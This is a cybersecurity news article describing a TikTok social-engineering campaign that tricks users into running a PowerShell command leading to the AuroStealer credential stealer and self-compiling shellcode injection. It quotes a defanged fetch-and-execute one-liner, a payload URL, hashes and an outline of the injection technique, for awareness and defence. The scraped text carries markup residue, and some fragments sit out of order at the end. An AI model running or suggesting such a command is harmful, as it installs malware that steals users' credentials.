Cybercriminals are exploiting TikTok\u2019s massive user base to distribute sophisticated malware campaigns that promise free software activation but deliver dangerous payloads instead.<\/p>\n
The attack leverages social engineering tactics reminiscent of the ClickFix technique, where unsuspecting users are tricked into executing malicious PowerShell commands on their systems.<\/p>\n
Victims encounter TikTok videos offering free activation of popular software like Photoshop<\/a>, with one such video accumulating over 500 likes before detection.<\/p>\n The attack chain begins when users follow instructions to open PowerShell with administrator privileges and execute a deceptively simple one-liner command.<\/p>\n The initial infection vector instructs victims to run the command This first-stage payload (SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23) achieved a VirusTotal detection rate of 17\/63, demonstrating its evasive capabilities.<\/p>\n The script downloads a secondary executable called updater.exe from hxxps:\/\/file-epq[.]pages[.]dev\/updater.exe, which analysis revealed as AuroStealer malware designed to harvest sensitive credentials and system information.<\/p>\n Internet Storm Center researchers identified<\/a> the campaign and discovered that persistence mechanisms are implemented through scheduled tasks disguised as legitimate system processes.<\/p>\n The malware randomly selects task names such as \u201cMicrosoftEdgeUpdateTaskMachineCore\u201d to blend in with genuine Windows services, ensuring execution at every user logon.<\/p>\n A third payload named source.exe (SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011) introduces an advanced evasion technique by compiling C# code on-demand during runtime using the .NET Framework compiler located at The self-compiling capability represents a sophisticated approach to evade traditional detection mechanisms<\/a>.<\/p>\n The malware<\/a> compiles a C# class during execution that imports kernel32.dll functions including VirtualAlloc, CreateThread, and WaitForSingleObject.<\/p>\n This dynamically compiled code allocates executable memory space, injects shellcode directly into the process memory, and creates a new thread to execute the malicious payload without writing additional files to disk.<\/p>\n Researchers discovered multiple variations of this campaign across TikTok targeting users searching for cracked versions of various software applications, highlighting the importance of avoiding untrusted sources for software downloads.<\/p>\n Follow us on\u00a0Google News<\/a>,\u00a0LinkedIn<\/a>,\u00a0and\u00a0X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0Set CSN as a Preferred Source in\u00a0Google<\/a>.<\/strong><\/p>\n The post Hackers Using TikTok Videos to Deploy Self-Compiling Malware That Leverages PowerShell for Execution<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\niex (irm slmgr[.]win\/photoshop)<\/code>, which fetches and executes malicious PowerShell code<\/a> from a remote server.<\/p>\n![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgc_mqP8IozQqX3oFgcqyJ60N2VspFUraHv8Ja9IEkwo3P-6WhLyT4ySpoLp6Aecc1p1XDY5qOgKylt8xdA5XcR2csJcT0Nr863iTK5Ok40lcSbR4wGDfVlT1RxNrVdEJXfRUoOvsZ-R-xnybUiSX7F5Tf8zibksv6xIrIB1Pdh-6rm69_G2gt8PzIyZvo\/s16000\/Fake%2520TikTok%2520video%2520%28Source%2520-%2520Internet%2520Storm%2520Center%29.webp?ssl=1\")
C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe<\/code>.<\/p>\nSelf-Compiling Technique and Memory Injection<\/strong><\/h2>\n